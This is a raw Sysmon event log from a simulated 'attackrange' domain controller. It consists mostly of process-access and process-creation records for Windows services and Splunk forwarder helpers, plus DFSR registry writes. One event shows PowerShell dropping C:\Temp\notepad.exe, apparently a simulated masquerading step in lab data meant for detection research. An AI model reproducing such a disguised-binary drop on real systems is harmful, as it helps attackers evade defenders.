16:02:10.142{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029391Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:10.142{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029390Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:10.142{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029389Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:10.142{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-5402-6008-B206-00000000A301}5124C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029388Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:10.142{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5402-6008-B206-00000000A301}5124C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029387Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:10.143{7901BC46-5402-6008-B206-00000000A301}5124C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029412Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.767{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5403-6008-B406-00000000A301}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029411Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.767{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029410Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.767{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029409Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.767{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029408Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.767{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029407Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.767{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5403-6008-B406-00000000A301}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029406Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.767{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5403-6008-B406-00000000A301}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029405Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.768{7901BC46-5403-6008-B406-00000000A301}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029404Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.252{7901BC46-5403-6008-B306-00000000A301}51844360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029403Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.095{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5403-6008-B306-00000000A301}5184C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029402Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.095{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029401Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.095{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029400Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.095{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029399Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.095{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029398Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.095{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5403-6008-B306-00000000A301}5184C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029397Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.095{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5403-6008-B306-00000000A301}5184C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029396Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:11.096{7901BC46-5403-6008-B306-00000000A301}5184C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029413Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:02:39.657{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000029416Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:03:01.125{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x800000000000000029415Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:03:01.109{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\32DFA675-0D71-42BD-A7E4-DA19B09BA9BB\Config SourceDWORD (0x00000001) 13241300x800000000000000029414Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:03:01.109{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\32DFA675-0D71-42BD-A7E4-DA19B09BA9BB\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_32DFA675-0D71-42BD-A7E4-DA19B09BA9BB.XML 11241100x800000000000000029417Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.localEXE2021-01-20 16:03:04.000{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Temp\notepad.exe2021-01-20 16:03:04.000 10341000x800000000000000029433Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:07.906{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-543B-6008-B606-00000000A301}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029432Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:07.906{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029431Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 